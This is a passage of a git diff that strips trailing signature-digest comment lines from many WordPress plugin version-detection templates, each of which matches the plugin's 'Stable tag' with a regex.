490a00463044022030441c75c70d9e7315eea80e80afcef8390eb19a25425d791cc9d4ab280659da0220702b3330c0957f02bfcaadb4f685b44319a9f453596ec16d2fd0fb226738460e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml b/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml index 9c5e266306..7a9746a70d 100644 --- a/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml +++ b/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502207e72f8438a40d177a19af6ed30c5513314b0e66fd803f4f24c43459461d5d1a102210085994c9d23f14a646dd5dc07e7385e3ddc0c6064efa72ceb3ef1a1d2cba82bb8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/simple-custom-post-order.yaml b/http/technologies/wordpress/plugins/simple-custom-post-order.yaml index e02d21778b..3fe86debf5 100644 --- a/http/technologies/wordpress/plugins/simple-custom-post-order.yaml +++ b/http/technologies/wordpress/plugins/simple-custom-post-order.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502206eaf7e0b49e28ce381c17456eeca8ba5af3c175fdc5e3c1b4b83d8d3646acfcd022100e0326c56743dada3adb3768b8ea9147e30ea6e3f0776a5d8d466388cc16668f0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/simple-history.yaml b/http/technologies/wordpress/plugins/simple-history.yaml index a381b416c3..18a7437e94 100644 --- a/http/technologies/wordpress/plugins/simple-history.yaml +++ b/http/technologies/wordpress/plugins/simple-history.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100a58c905230578a4b403d74e7d9103ef792413bb3d7325438ae8736b2e94f32dc022100d60549a0e318aca655e5c4ea60e763fbc51be0b229c9a627efa7e139363e0212:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/siteguard.yaml b/http/technologies/wordpress/plugins/siteguard.yaml index 606e304e8b..3deac58709 100644 --- a/http/technologies/wordpress/plugins/siteguard.yaml +++ b/http/technologies/wordpress/plugins/siteguard.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100f399a375b4c45568a38491f34a16d5c607ef295975bb006a71bc8a94cabe81a2022100eb3731d8903c3c792cbea8bbb7ec9833f90b13be801d7ed689b792c99809e9d0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/siteorigin-panels.yaml b/http/technologies/wordpress/plugins/siteorigin-panels.yaml index a0426f22e8..e7e7c27682 100644 --- a/http/technologies/wordpress/plugins/siteorigin-panels.yaml +++ b/http/technologies/wordpress/plugins/siteorigin-panels.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220095eeef95f5e75b2ab03b8a978e5ec813b56c1d6657b9a924d3359da5763cfbc022046d73ec0792b9bbae5cf445028f8c2d31abf0f3a743dbfefef5a539d24a4dad6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/smart-slider-3.yaml b/http/technologies/wordpress/plugins/smart-slider-3.yaml index 7736aadb9c..ad4ebefa4b 100644 --- a/http/technologies/wordpress/plugins/smart-slider-3.yaml +++ b/http/technologies/wordpress/plugins/smart-slider-3.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100973aa605f0c6d354b2bb53840292fb6c907db43ff1e88f6c45e48bf19a6273b402206062b97db7c54252cf0d2317efde69a676b22ab0b9e7f4efb0a24b15299712ad:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/so-widgets-bundle.yaml b/http/technologies/wordpress/plugins/so-widgets-bundle.yaml index a692745092..8e88c81c0a 100644 --- a/http/technologies/wordpress/plugins/so-widgets-bundle.yaml +++ b/http/technologies/wordpress/plugins/so-widgets-bundle.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220485610a56efcfd0eeee4a2c5f0668892b9c62779e8b7c920f1fbf3cbe7e5a7e8022008bae5a3b6139fcd141d5a5b7998e7eb6a98894e2565ea5b22f94dbbdc455f6c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml b/http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml index e8ce702b73..39d269fb85 100644 --- a/http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml +++ b/http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022072cf192157f2cc4519935f6806e0679c9f8e1be0869439c4f07b5e068c8fd3e20221009fadd38fdb02a896d952c927249983cb489fceab96490717d737e887403aba14:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml b/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml index fd7f3b3304..fc126d83c6 100644 --- a/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml +++ b/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100fac65f0eb0aa62535b71cf0f6e47ed9d4bf0e0f709d953f498d0f25567aec693022060ba83dcdb8c0f2148e92788a09eb34b5dfdeef25b583bbe9f8b2fbedbfdc0a2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/sucuri-scanner.yaml b/http/technologies/wordpress/plugins/sucuri-scanner.yaml index e93c617ae4..8c49a34259 100644 --- a/http/technologies/wordpress/plugins/sucuri-scanner.yaml +++ b/http/technologies/wordpress/plugins/sucuri-scanner.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022053a1b07f544451c478bb2f251ee14707b19f72f8b550a8cc8d0dbfde8ba3bac902207e51ac4aeeefea8a7b6031f08e7003bf20f58b4046bb36566be2f13efedc2f47:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/svg-support.yaml b/http/technologies/wordpress/plugins/svg-support.yaml index 7ee3cb8a9f..c20ed6552a 100644 --- a/http/technologies/wordpress/plugins/svg-support.yaml +++ b/http/technologies/wordpress/plugins/svg-support.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220546f3a7f67cb7005e7aedbaa3101588dea64d1ca0badb125e2346de0fe0f976c02204b59913ba82c6ea7cb76f6eb7811f8336ded74ac24227f3434d05dbb414c54ce:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/table-of-contents-plus.yaml b/http/technologies/wordpress/plugins/table-of-contents-plus.yaml index a7914f3e34..6ac2212b4b 100644 --- a/http/technologies/wordpress/plugins/table-of-contents-plus.yaml +++ b/http/technologies/wordpress/plugins/table-of-contents-plus.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100f8539959cbc61226b3526076222ca63480087b1da429ca1e814a850548ea9d89022100c7cdd8c2c646dd2c69e9a25024f95e6c4ec2ec9becbc5e6782e4301834c31258:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/tablepress.yaml b/http/technologies/wordpress/plugins/tablepress.yaml index 245a6240f3..71c71b5ed1 100644 --- a/http/technologies/wordpress/plugins/tablepress.yaml +++ b/http/technologies/wordpress/plugins/tablepress.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502204d8d391ee895402c4d1df94ee0e71c6a4a041074418f1421ad4cb58fa6560176022100e606e0713a4654b45d56f5d2d5878c098987254d02fcc7e2b27dd95e7892d159:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml b/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml index 7677e97e63..7b47adc274 100644 --- a/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml +++ b/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a004830460221008d0fef46116bf2dddfb9ea4f727c20a2fa8fb79a8fa2cc13dfb72b5f0a480e5e022100b7cab99ca4ef12e64da03fa1daf081fa4a7a66f626729aece97b2c3362929d49:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/templately.yaml b/http/technologies/wordpress/plugins/templately.yaml index accc08a18b..38391bd9f3 100644 --- a/http/technologies/wordpress/plugins/templately.yaml +++ b/http/technologies/wordpress/plugins/templately.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a004830460221009844f8f52ee932e51071b156b9708af9a2f9f9883618d64b9be5b11af8f9a65c02210096e02f7f18e8475880a23a6f595a7516b2475bf86331d599c5c8d615baece299:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/the-events-calendar.yaml b/http/technologies/wordpress/plugins/the-events-calendar.yaml index 1766a96343..c4928059f6 100644 --- a/http/technologies/wordpress/plugins/the-events-calendar.yaml +++ b/http/technologies/wordpress/plugins/the-events-calendar.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022031928333120702772175e03202d14da8f04ed69abc6bdf1b23ae8f245bf162cb022100b515ed1bffa9a5553a3d25373125cdb26f85a66da5cd41c7a24661580b31b7cd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/tinymce-advanced.yaml b/http/technologies/wordpress/plugins/tinymce-advanced.yaml index a4d8581d4e..f6a7836f35 100644 --- a/http/technologies/wordpress/plugins/tinymce-advanced.yaml +++ b/http/technologies/wordpress/plugins/tinymce-advanced.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100907a3352e98c748142f4fbf474800d5863e8317a4ebac2243ada378e4b41b796022028665073e9a5b37d8807a65b6dd43cadd8682b281a89eecd7f1816da9f5fad71:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/translatepress-multilingual.yaml b/http/technologies/wordpress/plugins/translatepress-multilingual.yaml index 25dc3b21dd..b7af708c4f 100644 --- a/http/technologies/wordpress/plugins/translatepress-multilingual.yaml +++ b/http/technologies/wordpress/plugins/translatepress-multilingual.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100a98caae280f204baa430d6b1a48cc30d92907a94cdd74dc41d84dbc2bbce2ad2022100bac7da0a2397c5f4ed5da0396d52863c8c12769c0bb10ce2acfdece2b83486d8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml b/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml index b5366c1076..61a793edf7 100644 --- a/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml +++ b/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502203b1be62644ea84aa4938779cc0b6f283c851c9b27abad09794b5bbf77924658a0221008f1d626566f908aa54ea42ee1b896ea3a8afa53b6f842d27c6ee05f94adf493c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/under-construction-page.yaml b/http/technologies/wordpress/plugins/under-construction-page.yaml index a8ecbf55cd..0da88d5d3f 100644 --- a/http/technologies/wordpress/plugins/under-construction-page.yaml +++ b/http/technologies/wordpress/plugins/under-construction-page.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100ef96664dd42071eab9f8e3a6fa8e46ddb52039430788e99ec11320122ca6913d022100d9b2ba16674352cf58813b90d6bbf7973e9f207798f0588fe320e2dd8dd5e7b7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/updraftplus.yaml b/http/technologies/wordpress/plugins/updraftplus.yaml index 265c6af1dc..2b29428cf1 100644 --- a/http/technologies/wordpress/plugins/updraftplus.yaml +++ b/http/technologies/wordpress/plugins/updraftplus.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a0048304602210083e341a44305353a235341e216b40588240ecce668778e57ebcffc53b80dee37022100fd59d13595fa59aadd55f171d85a83b8ee043f57707241edfce4185200301527:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/user-role-editor.yaml b/http/technologies/wordpress/plugins/user-role-editor.yaml index 97092225cb..181e619a7c 100644 --- a/http/technologies/wordpress/plugins/user-role-editor.yaml +++ b/http/technologies/wordpress/plugins/user-role-editor.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100e902d520427972d03d2991ed2b7f8d6a0938779bdc02019193ee6778205a877402206083afa0697bdfab25d9a42bfec63734bfce9b6ba043b19ecc91250ba35734ad:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/w3-total-cache.yaml b/http/technologies/wordpress/plugins/w3-total-cache.yaml index 2e9f194e0d..8164eb4483 100644 --- a/http/technologies/wordpress/plugins/w3-total-cache.yaml +++ b/http/technologies/wordpress/plugins/w3-total-cache.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100d662cb04a1dabd1ee76715435dce8bfed247791e074d69ac49d610d82a2ee20d0221008cb4c8b898c555029a02d40cbe4dec2c247b10de9fa02307ed832aa40909e41f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/webp-converter-for-media.yaml b/http/technologies/wordpress/plugins/webp-converter-for-media.yaml index e470d469b1..59554defdf 100644 --- a/http/technologies/wordpress/plugins/webp-converter-for-media.yaml +++ b/http/technologies/wordpress/plugins/webp-converter-for-media.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100b0533a9ba20b5d3609ca261be08494bba7746fcf3093a4218dbe63a3c85f353c0220248f3541598ad316bd6290943c4a0524b0f403fc9f6df072b4cdef2dc6f8fe06:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/webp-express.yaml b/http/technologies/wordpress/plugins/webp-express.yaml index 24490f6676..350fd9436b 100644 --- a/http/technologies/wordpress/plugins/webp-express.yaml +++ b/http/technologies/wordpress/plugins/webp-express.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450220052a4648293e9d8d5db221c425d200c731bf66056b2dc32edd0e57b625c0d637022100a88a092477b44ffa390ae9ed630e3563fed34062ce863708398678ca88f8fe85:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/widget-importer-exporter.yaml b/http/technologies/wordpress/plugins/widget-importer-exporter.yaml index 72032e6c54..2ae6bafbba 100644 --- a/http/technologies/wordpress/plugins/widget-importer-exporter.yaml +++ b/http/technologies/wordpress/plugins/widget-importer-exporter.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402206d040179b8080c1aa4558a08a58e95fc58047042e9c9fe1909d54a35edb5b82702201e4126173e73ecb3a72cb7b4166601413850051f34cc46ab0fe606587c88e985:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml b/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml index d5dac3f9cb..d0dc8d92bb 100644 --- a/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml +++ b/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100d8b7da572c2822f6655b28145c6cb67bb8b8869948fb03fea677df6867c1ad8a022100aa4ce26e2a282ed121670c44f3dbaf13a111a8900948fbc29d91be6e27944fc4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml b/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml index 45e9567375..c49bbc2b6d 100644 --- a/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml +++ b/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100ec427d83b4fe0369733e0c5fdf7f8eec8c1dd0c44e7bb1fb78f3c3bcfd80dcde0220327c60cebf59e378635a9cf27f6d3f759e0c1ea0463eb724e6fb211b9681d92c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woo-variation-swatches.yaml b/http/technologies/wordpress/plugins/woo-variation-swatches.yaml index a06deef3a7..27586cbd9d 100644 --- a/http/technologies/wordpress/plugins/woo-variation-swatches.yaml +++ b/http/technologies/wordpress/plugins/woo-variation-swatches.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502200ed3e7bc5d9d3d0e95b5ba53fb3b3c685a01b683101cb1dae788fa458c23f5c7022100ec9a7698f50650a3813501cb9966e2b3528f915a7e9e4523702af0fd3abc5ff0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml b/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml index 0f6234a4c9..946272f0a9 100644 --- a/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022074c11f0f07e0fe0c538def6619a55f86e7d04f5df3cbbf71cacc73379d81a90e022100dd8ecbcda91ebeae8e0eaf988010d7012ae1cd0295e3e68647662431a090e64a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml b/http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml index aae3966dba..aa29706872 100644 --- a/http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022010a031d35d0ebcb452f06f1304d25363b6e93ba6cfd6e68dee09dc518a9fee9f022100be00dbcceac8fa501febd8d66d96915a0a67035b196bff8d8c2e66141c4e98d8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-payments.yaml b/http/technologies/wordpress/plugins/woocommerce-payments.yaml index dadae6d88d..290d53ab7e 100644 --- a/http/technologies/wordpress/plugins/woocommerce-payments.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-payments.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402202adf67fbf461e376606a486bdc2ff0293722830463e2160e0722ed7f51365416022075d38c67d88b7acb1019e2d5c2a85de89b147a849197d2a9cc04b6ab6b8ca4c2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml b/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml index 38393452b9..e83e8d79e7 100644 --- a/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220655eb9c8cedc50eb5c7869af5a57ac9c715861812e0e050fb8c6c2003b674c4302201af0562e8b7b8f61b2c99b7a583afc79ad2856cea0d2d92025b56ba94bbfeddb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml b/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml index f8d9ab6368..f1c16275a2 100644 --- a/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022039eae9a08f1fee7ad95373b8a5b186fff15313b7cd58e72c2746b50a7129223902202d6a474ec4235ff36b2da3d7ae9dfac74f81b23ed343e1fd50a2eb3078b13513:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-services.yaml b/http/technologies/wordpress/plugins/woocommerce-services.yaml index a098dae406..fc072e19d8 100644 --- a/http/technologies/wordpress/plugins/woocommerce-services.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-services.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402206293c11aada467bc542635eb3f9c8d42a987c73c677d7176c03d86e99532bd230220454533de766ef8b9599e8158f7e5224ef9496b74d581cb2ccc6a629366ad5e93:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce.yaml b/http/technologies/wordpress/plugins/woocommerce.yaml index ccc23ffeeb..da9df0e8a5 100644 --- a/http/technologies/wordpress/plugins/woocommerce.yaml +++ b/http/technologies/wordpress/plugins/woocommerce.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100b4f2f5b837429d493f9fa2124dca2e60692e21fe71dd43aba07824e73724081a022100a813381ff7dc04b4cffe28e3de0bf593a3f310fea2f4ac00b216e700510494f8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wordfence.yaml b/http/technologies/wordpress/plugins/wordfence.yaml index f14f19c1af..f8113d9750 100644 --- a/http/technologies/wordpress/plugins/wordfence.yaml +++ b/http/technologies/wordpress/plugins/wordfence.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100b73ae6860edc910ac75071f13c8ddd51eafacedc8edfe67fb94bd2a64851f63d022100e1064bbeee3bc2b5d13424cc3dbcfc4a0ed72fcdeafbb789bb56175c8610c0b1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wordpress-importer.yaml b/http/technologies/wordpress/plugins/wordpress-importer.yaml index d293930059..5f80282ab2 100644 --- a/http/technologies/wordpress/plugins/wordpress-importer.yaml +++ b/http/technologies/wordpress/plugins/wordpress-importer.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a004830460221008e43e11bd55b3edf065784f397c5cb9d0305ff812d42822e8b2f9bc13755b909022100c265425f4c9ce3b9dfc37ba4ffa7239a70f74a7887e5cfd894ad240e12daef27:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wordpress-seo.yaml b/http/technologies/wordpress/plugins/wordpress-seo.yaml index b804975091..5725d5bb3f 100644 --- a/http/technologies/wordpress/plugins/wordpress-seo.yaml +++ b/http/technologies/wordpress/plugins/wordpress-seo.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100cd1d94b86193fc8d0f8214b73fa2ecfd58cfa6d9aaeed9df94efa623d0760fd3022100f70c53f0436442be837d549918953aff1b017f16d926f1785f48732f434a1e51:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/worker.yaml b/http/technologies/wordpress/plugins/worker.yaml index 1e70540b5c..f67a8bc18a 100644 --- a/http/technologies/wordpress/plugins/worker.yaml +++ b/http/technologies/wordpress/plugins/worker.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220451a59b05bcf4e09db335ef889ba01917e6579ee8899215d652354151bdcd413022016558fe4d2da3d62867c162177fadfd4019c7054b71aecbc710ac115d4275e14:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-fastest-cache.yaml b/http/technologies/wordpress/plugins/wp-fastest-cache.yaml index fcbf218f04..b9bd4be0a8 100644 --- a/http/technologies/wordpress/plugins/wp-fastest-cache.yaml +++ b/http/technologies/wordpress/plugins/wp-fastest-cache.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450220522101dfa9bb6c38a0be087da6b667c4cb472a9405dfc60a7a1075c0da92da2a022100fd6c167daddab4bb2214a5c6d99e1ad5554b8555ee4f3908ea70ffb8a7e4b14b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-file-manager.yaml b/http/technologies/wordpress/plugins/wp-file-manager.yaml index d8f2649cf9..bece4ce486 100644 --- a/http/technologies/wordpress/plugins/wp-file-manager.yaml +++ b/http/technologies/wordpress/plugins/wp-file-manager.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100f466aa7e6d1122ef1eeca94f6fd71aaa1ff58a244c2d65a3010bf095ba108012022054df6d4fbde272d60b16a179d9102217b2a95ade098dc268941851f67fdeec64:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-google-maps.yaml b/http/technologies/wordpress/plugins/wp-google-maps.yaml index 08a21e9a12..138b0aa9a6 100644 --- a/http/technologies/wordpress/plugins/wp-google-maps.yaml +++ b/http/technologies/wordpress/plugins/wp-google-maps.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100f69ca12ab116019de54b21faec503496dbca9f22ef5646dcd2f2348cda8a7d5a022100e6359270377aae469568dc721052898f1e7f2033508975708445ee6237436fc3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-mail-smtp.yaml b/http/technologies/wordpress/plugins/wp-mail-smtp.yaml index 4230995cbe..68bf71bc83 100644 --- a/http/technologies/wordpress/plugins/wp-mail-smtp.yaml +++ b/http/technologies/wordpress/plugins/wp-mail-smtp.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100f4b362d553d4277b2794b1c4391b90e590c5ae63bc80eb0ae80c4f0c8f2ef7f00221009ad0a4ebcd091c44a1ec2c5757a5a1bdb242c6fee6b314119624010e24d6ec75:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml b/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml index cb6eaf59c7..10dad2d2fb 100644 --- a/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml +++ b/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220319852ddfe398a3023e5702929aa625952d660252985024cfcb243637fd299f402201fe94b6658ebad42927e112b0e963395bb76464ed6b31af3767e3358edbbcced:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-migrate-db.yaml b/http/technologies/wordpress/plugins/wp-migrate-db.yaml index c5cd1fa938..e9efe6fb53 100644 --- a/http/technologies/wordpress/plugins/wp-migrate-db.yaml +++ b/http/technologies/wordpress/plugins/wp-migrate-db.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 